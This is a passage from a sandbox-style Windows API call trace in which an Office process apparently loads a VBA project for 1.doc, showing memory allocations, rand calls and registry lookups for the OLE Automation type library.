_MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.905] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb1cb0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.905] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0058.906] IUnknown:AddRef (This=0x1d3980663b0) returned 0x3 [0058.906] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb21a8 | out: ppvObject=0x33e4fb21a8*=0x0) returned 0x80004002 [0058.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x33e4fb2170, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0058.906] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA") returned 0x50e2f7 [0058.906] IUnknown:Release (This=0x1d3980663b0) returned 0x2 [0058.906] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8300 [0058.906] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d4a8300) returned 0x0 [0058.906] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8290 [0058.906] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d4a8290) returned 0x0 [0058.906] VirtualQuery (in: lpAddress=0x33e4fb4340, lpBuffer=0x33e4fb4300, dwLength=0x30 | out: lpBuffer=0x33e4fb4300*(BaseAddress=0x33e4fb4000, AllocationBase=0x33e4ec0000, AllocationProtect=0x4, __alignment1=0xffffc301, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0058.906] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8220 [0058.906] qsort (in: _Base=0x1d39d4a8220, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7ffce0b61bbc | out: _Base=0x1d39d4a8220) [0058.908] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8220) [0058.908] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39d613de0 [0058.908] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc) returned 0x1d39d614320 [0058.908] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d614320) returned 0xc [0058.908] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Win16") returned 0x507ec1 [0058.908] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Win32") returned 0x507f07 [0058.908] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Win64") returned 0x507f78 [0058.908] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Mac") returned 0x50b2b3 [0058.908] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA6") returned 0x5023ad [0058.908] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA7") returned 0x5023ae [0058.908] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8290) [0058.908] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8300) [0058.908] CoCreateGuid (in: pguid=0x33e4fb4448 | out: pguid=0x33e4fb4448*(Data1=0x91e46408, Data2=0x55fe, Data3=0x4150, Data4=([0]=0x89, [1]=0x3e, [2]=0xba, [3]=0xb2, [4]=0x8c, [5]=0xf7, [6]=0x5a, [7]=0x1b))) returned 0x0 [0058.908] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x6b0) returned 0x1d39d9e7520 [0058.908] srand (_Seed=0x5196) [0058.908] rand () returned 2707 [0058.908] rand () returned 5367 [0058.908] rand () returned 3107 [0058.908] rand () returned 25991 [0058.908] rand () returned 22224 [0058.908] rand () returned 7173 [0058.908] rand () returned 3305 [0058.908] rand () returned 5542 [0058.908] rand () returned 21093 [0058.908] rand () returned 7093 [0058.908] rand () returned 29645 [0058.908] rand () returned 30555 [0058.908] rand () returned 4452 [0058.908] rand () returned 15519 [0058.908] rand () returned 22682 [0058.908] rand () returned 20118 [0058.908] rand () returned 26125 [0058.908] rand () returned 28117 [0058.908] rand () returned 31912 [0058.908] rand () returned 27549 [0058.908] rand () returned 25247 [0058.909] rand () returned 12135 [0058.909] rand () returned 31572 [0058.909] rand () returned 27055 [0058.909] rand () returned 11630 [0058.909] rand () returned 26157 [0058.909] rand () returned 24237 [0058.909] rand () returned 16615 [0058.909] rand () returned 23350 [0058.909] rand () returned 7360 [0058.909] rand () returned 27760 [0058.909] rand () returned 12132 [0058.909] rand () returned 17327 [0058.909] rand () returned 21962 [0058.909] rand () returned 16183 [0058.909] rand () returned 15783 [0058.909] rand () returned 1121 [0058.909] rand () returned 21376 [0058.909] rand () returned 32749 [0058.909] rand () returned 25148 [0058.909] rand () returned 9658 [0058.909] rand () returned 30828 [0058.909] rand () returned 21381 [0058.909] rand () returned 2205 [0058.909] rand () returned 5726 [0058.909] rand () returned 9584 [0058.909] rand () returned 20715 [0058.909] rand () returned 32595 [0058.909] rand () returned 28862 [0058.909] rand () returned 14600 [0058.909] rand () returned 4923 [0058.909] rand () returned 4446 [0058.909] rand () returned 16108 [0058.909] rand () returned 5071 [0058.909] rand () returned 15410 [0058.909] rand () returned 20183 [0058.909] rand () returned 12462 [0058.909] rand () returned 17989 [0058.909] rand () returned 31458 [0058.909] rand () returned 18644 [0058.909] rand () returned 30673 [0058.909] rand () returned 19407 [0058.909] rand () returned 27305 [0058.909] rand () returned 17548 [0058.909] rand () returned 16063 [0058.909] rand () returned 30463 [0058.910] rand () returned 24163 [0058.910] rand () returned 10684 [0058.910] rand () returned 27988 [0058.910] rand () returned 29462 [0058.910] rand () returned 27615 [0058.910] rand () returned 12361 [0058.910] rand () returned 12270 [0058.910] rand () returned 32455 [0058.910] rand () returned 19344 [0058.910] rand () returned 4390 [0058.910] rand () returned 29891 [0058.910] rand () returned 17470 [0058.910] rand () returned 24709 [0058.910] rand () returned 15992 [0058.910] rand () returned 21368 [0058.910] rand () returned 29281 [0058.910] rand () returned 31899 [0058.910] rand () returned 26360 [0058.910] rand () returned 4847 [0058.910] rand () returned 31574 [0058.910] rand () returned 13554 [0058.910] rand () returned 18585 [0058.910] rand () returned 16736 [0058.910] rand () returned 7237 [0058.910] rand () returned 23197 [0058.910] rand () returned 5740 [0058.910] rand () returned 4779 [0058.910] rand () returned 4703 [0058.910] rand () returned 27550 [0058.910] rand () returned 30144 [0058.910] rand () returned 30956 [0058.910] rand () returned 8479 [0058.910] rand () returned 4113 [0058.910] rand () returned 22157 [0058.910] rand () returned 11088 [0058.910] rand () returned 19919 [0058.910] rand () returned 30631 [0058.910] rand () returned 11027 [0058.910] rand () returned 3880 [0058.910] rand () returned 29775 [0058.910] rand () returned 11094 [0058.910] rand () returned 17086 [0058.910] rand () returned 14140 [0058.910] rand () returned 6418 [0058.911] rand () returned 10063 [0058.911] rand () returned 19533 [0058.911] rand () returned 28002 [0058.911] rand () returned 7273 [0058.911] rand () returned 20785 [0058.911] rand () returned 17203 [0058.911] rand () returned 31311 [0058.911] rand () returned 13060 [0058.911] rand () returned 7804 [0058.911] rand () returned 19517 [0058.911] rand () returned 8108 [0058.911] rand () returned 18357 [0058.911] rand () returned 32584 [0058.911] rand () returned 17782 [0058.911] rand () returned 30829 [0058.911] rand () returned 10872 [0058.911] rand () returned 24887 [0058.911] rand () returned 3400 [0058.911] rand () returned 13150 [0058.911] rand () returned 12465 [0058.911] rand () returned 24232 [0058.911] rand () returned 17635 [0058.911] rand () returned 23550 [0058.911] rand () returned 10932 [0058.911] rand () returned 28205 [0058.911] rand () returned 4579 [0058.911] rand () returned 9617 [0058.911] rand () returned 21130 [0058.911] rand () returned 9792 [0058.911] rand () returned 9004 [0058.911] rand () returned 27761 [0058.911] rand () returned 6131 [0058.911] rand () returned 26929 [0058.911] rand () returned 32025 [0058.911] rand () returned 24997 [0058.911] rand () returned 28071 [0058.911] rand () returned 3427 [0058.911] rand () returned 20695 [0058.911] rand () returned 5300 [0058.911] rand () returned 31713 [0058.911] rand () returned 21944 [0058.911] rand () returned 25355 [0058.911] rand () returned 20411 [0058.912] rand () returned 23582 [0058.912] rand () returned 20042 [0058.912] rand () returned 17851 [0058.912] rand () returned 31166 [0058.912] rand () returned 16930 [0058.912] rand () returned 24924 [0058.912] rand () returned 26987 [0058.912] rand () returned 29500 [0058.912] rand () returned 13885 [0058.912] rand () returned 14480 [0058.912] rand () returned 18822 [0058.912] rand () returned 8454 [0058.912] rand () returned 17612 [0058.912] rand () returned 15962 [0058.912] rand () returned 14336 [0058.912] rand () returned 6481 [0058.912] rand () returned 18178 [0058.912] rand () returned 21428 [0058.912] rand () returned 3130 [0058.912] rand () returned 9993 [0058.912] rand () returned 10473 [0058.912] rand () returned 3603 [0058.912] rand () returned 14630 [0058.912] rand () returned 5992 [0058.912] rand () returned 20643 [0058.912] rand () returned 4506 [0058.912] rand () returned 3755 [0058.912] rand () returned 1480 [0058.912] rand () returned 2806 [0058.912] rand () returned 23438 [0058.912] rand () returned 10827 [0058.912] rand () returned 6581 [0058.912] rand () returned 8456 [0058.912] rand () returned 4363 [0058.912] rand () returned 23299 [0058.912] rand () returned 27463 [0058.912] rand () returned 31590 [0058.912] rand () returned 9717 [0058.912] rand () returned 31858 [0058.912] rand () returned 430 [0058.912] rand () returned 30283 [0058.912] rand () returned 28720 [0058.912] rand () returned 3390 [0058.912] rand () returned 8207 [0058.913] rand () returned 19232 [0058.913] rand () returned 31508 [0058.913] rand () returned 1204 [0058.913] rand () returned 21647 [0058.913] rand () returned 13119 [0058.913] rand () returned 12059 [0058.913] rand () returned 11182 [0058.913] rand () returned 32173 [0058.913] rand () returned 10236 [0058.913] rand () returned 8669 [0058.913] rand () returned 31930 [0058.913] rand () returned 14804 [0058.913] rand () returned 25574 [0058.913] rand () returned 8767 [0058.913] rand () returned 20344 [0058.913] rand () returned 30000 [0058.913] rand () returned 2378 [0058.913] rand () returned 21735 [0058.913] rand () returned 21316 [0058.913] rand () returned 2498 [0058.913] rand () returned 4601 [0058.913] rand () returned 29939 [0058.913] rand () returned 7445 [0058.913] rand () returned 9647 [0058.913] rand () returned 27723 [0058.913] rand () returned 3306 [0058.913] rand () returned 19621 [0058.913] rand () returned 27614 [0058.913] rand () returned 26980 [0058.913] rand () returned 15346 [0058.913] rand () returned 3283 [0058.913] rand () returned 705 [0058.913] rand () returned 24758 [0058.913] rand () returned 23364 [0058.913] rand () returned 29509 [0058.913] rand () returned 1395 [0058.913] rand () returned 11463 [0058.913] rand () returned 6110 [0058.913] rand () returned 849 [0058.913] rand () returned 2820 [0058.913] rand () returned 25909 [0058.913] rand () returned 21623 [0058.913] rand () returned 22558 [0058.913] rand () returned 14353 [0058.914] rand () returned 31223 [0058.914] rand () returned 26552 [0058.914] rand () returned 14854 [0058.914] rand () returned 3735 [0058.914] rand () returned 5093 [0058.914] rand () returned 2729 [0058.914] rand () returned 9023 [0058.914] rand () returned 28680 [0058.914] CoCreateGuid (in: pguid=0x1d3984c9b78 | out: pguid=0x1d3984c9b78*(Data1=0x759a418b, Data2=0x8cd1, Data3=0x404c, Data4=([0]=0xa4, [1]=0x98, [2]=0xcd, [3]=0x52, [4]=0xbe, [5]=0x41, [6]=0xe7, [7]=0x90))) returned 0x0 [0058.914] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x0) returned 0x1d39d4a82a0 [0058.914] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39d5faee0 [0058.914] strcpy_s (in: _Dst=0x1d3984c9bd8, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0058.914] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2028) returned 0x1d39d9ed110 [0058.914] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10020) returned 0x1d39d9ef140 [0058.918] GetProcAddress (hModule=0x7ffce0560000, lpProcName=0x7ffce0be69a0) returned 0x0 [0058.918] CompareStringA (Locale=0x412, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0058.918] MultiByteToWideChar (in: CodePage=0x3a8, dwFlags=0x0, lpMultiByteStr=0x33e4fb4444, cbMultiByte=2, lpWideCharStr=0x33e4fb4458, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0058.918] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Project") returned 0x50ae2d [0058.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x33e4fb41e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0058.918] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Project") returned 0x50ae2d [0058.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x33e4fb40a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0058.918] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Project") returned 0x50ae2d [0058.918] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Project") returned 0x50ae2d [0058.919] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x18) returned 0x1d39d613e60 [0058.919] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982196f0) [0058.919] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398218d90 [0058.919] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398218d90, cb=0x44) returned 0x1d39d7b54b0 [0058.919] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d613e60) [0058.919] strcpy_s (in: _Dst=0x1d3984c9be8, _DstSize=0x8, _Src="Project" | out: _Dst="Project") returned 0x0 [0058.921] CLSIDFromString (in: lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x33e4fb43e0 | out: pclsid=0x33e4fb43e0*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0058.922] wcsncpy_s (in: _Destination=0x1d39d7d7148, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x30 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#") returned 0x0 [0058.922] wcscpy_s (in: _Destination=0x1d39d7d71a8, _SizeInWords=0x2f, _Source="C:\\Windows\\SysWOW64\\stdole2.tlb" | out: _Destination="C:\\Windows\\SysWOW64\\stdole2.tlb") returned 0x0 [0058.922] wcscpy_s (in: _Destination=0x1d39d7d71e6, _SizeInWords=0x10, _Source="#OLE Automation" | out: _Destination="#OLE Automation") returned 0x0 [0058.922] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d9e6d80, cb=0x680) returned 0x1d39d9cb2c0 [0058.922] wcscpy_s (in: _Destination=0x1d39d9cb580, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0058.922] wcsncpy_s (in: _Destination=0x33e4fb4030, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0058.922] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation") returned 0x5e [0058.922] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xbe) returned 0x1d39d7cf270 [0058.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x1d39d7cf270, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0058.922] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7cf270) [0058.922] wcscpy_s (in: _Destination=0x1d39d9e7400, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0058.922] wcsncpy_s (in: _Destination=0x33e4fb4070, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0058.922] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation") returned 0x5e [0058.922] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xbe) returned 0x1d39d7d1220 [0058.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x1d39d7d1220, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0058.922] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d1220) [0058.922] wcsncpy_s (in: _Destination=0x33e4fb4030, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.922] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb3f60, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.922] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0058.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x33e4fb4310, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0058.923] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="stdole") returned 0x506093 [0058.923] strcpy_s (in: _Dst=0x33e4fb40f0, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0058.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb40f0, cbMultiByte=7, lpWideCharStr=0x33e4fb3f40, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0058.923] IUnknown:AddRef (This=0x1d3980663b0) returned 0x3 [0058.923] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="stdole", lHashVal=0x506093, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.923] IUnknown:Release (This=0x1d3980663b0) returned 0x2 [0058.923] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x4 [0058.923] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="stdole", lHashVal=0x506093, pfName=0x33e4fb4010, pBstrLibName=0x33e4fb3f40 | out: pfName=0x33e4fb4010*=0, pBstrLibName=0x33e4fb3f40) returned 0x0 [0058.923] IUnknown:Release (This=0x1d3985c4c00) returned 0x3 [0058.923] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1000) returned 0x1d3984b0fb0 [0058.923] wcscpy_s (in: _Destination=0x1d39d7d7148, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0058.924] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x33e4fb36f0 | out: phkResult=0x33e4fb36f0*=0x11de) returned 0x0 [0058.924] RegOpenKeyW (in: hKey=0x11de, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x33e4fb36e8 | out: phkResult=0x33e4fb36e8*=0x120a) returned 0x0 [0058.924] RegEnumKeyW (in: hKey=0x120a, dwIndex=0x0, lpName=0x33e4fb3718, cchName=0xa | out: lpName="1.0") returned 0x0 [0058.924] RegEnumKeyW (in: hKey=0x120a, dwIndex=0x1, lpName=0x33e4fb3718, cchName=0xa | out: lpName="2.0") returned 0x0 [0058.925] wcscpy_s (in: _Destination=0x33e4fb3700, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0058.925] RegOpenKeyW (in: hKey=0x120a, lpSubKey="2.0", phkResult=0x33e4fb37a8 | out: phkResult=0x33e4fb37a8*=0x11e6) returned 0x0 [0058.925] _ultoa_s (in: _Val=0x0, _DstBuf=0x33e4fb3720, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0058.925] RegOpenKeyA (in: hKey=0x11e6, lpSubKey="0", phkResult=0x33e4fb3710 | out: phkResult=0x33e4fb3710*=0x120e) returned 0x0 [0058.925] RegOpenKeyW (in: hKey=0x120e, lpSubKey="win64", phkResult=0x33e4fb3718 | out: phkResult=0x33e4fb3718*=0x1212) returned 0x0 [0058.925] RegCloseKey (hKey=0x1212) returned 0x0 [0058.925] RegCloseKey (hKey=0x120e) returned 0x0 [0058.925] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb37b0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.925] RegOpenKeyW (in: hKey=0x11e6, lpSubKey="0", phkResult=0x33e4fb3788 | out: phkResult=0x33e4fb3788*=0x120e) returned 0x0 [0058.925] RegQueryValueW (in: hKey=0x120e, lpSubKey="win64", lpData=0x33e4fb37d0, lpcbData=0x33e4fb3784 | out: lpData="C:\\Windows\\System32\\stdole2.tlb", lpcbData=0x33e4fb3784) returned 0x0 [0058.925] wcscpy_s (in: _Destination=0x1d3984b0fb0, _SizeInWords=0x800, _Source="C:\\Windows\\System32\\stdole2.tlb" | out: _Destination="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0058.925] RegCloseKey (hKey=0x120e) returned 0x0 [0058.926] RegCloseKey (hKey=0x11e6) returned 0x0 [0058.926] RegCloseKey (hKey=0x120a) returned 0x0 [0058.926] RegCloseKey (hKey=0x11de) returned 0x0 [0058.926] LoadTypeLib (in: szFile="C:\\Windows\\System32\\stdole2.tlb", pptlib=0x33e4fb3df8*=0x0 | out: pptlib=0x33e4fb3df8*=0x1d3980655f0) returned 0x0 [0058.926] IUnknown:QueryInterface (in: This=0x1d3980655f0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb3bf8 | out: ppvObject=0x33e4fb3bf8*=0x0) returned 0x80004002 [0058.926] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980655f0, ppTLibAttr=0x33e4fb3bf0, pDummy=0x33e4fb3bf8 | out: ppTLibAttr=0x33e4fb3bf0, pDummy=0x33e4fb3bf8*=0x0) returned 0x0 [0058.926] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb3be8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d7d71a6 | out: pBstrName=0x33e4fb3be8*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d7d71a6) returned 0x0 [0058.926] StringFromGUID2 (in: rguid=0x1d398543190*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb3c10, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0058.926] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb3b5a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0058.926] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb3b5e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.926] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb3b62, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.926] wcscpy_s (in: _Destination=0x1d39d7d7e68, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0058.926] wcscpy_s (in: _Destination=0x1d39d7d7e6e, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0058.926] wcscpy_s (in: _Destination=0x1d39d7d7eba, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0058.926] wcscpy_s (in: _Destination=0x1d39d7d7ec8, _SizeInWords=0x2f, _Source="C:\\Windows\\System32\\stdole2.tlb" | out: _Destination="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0058.926] wcscpy_s (in: _Destination=0x1d39d7d7f08, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0058.926] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980655f0) returned 0x0 [0058.926] wcscpy_s (in: _Destination=0x1d3984b0fb0, _SizeInWords=0x800, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0058.927] wcscpy_s (in: _Destination=0x1d39d9cb640, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0058.927] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3984b0fb0) [0058.927] IUnknown:AddRef (This=0x1d3980655f0) returned 0x5 [0058.927] IUnknown:QueryInterface (in: This=0x1d3980655f0, 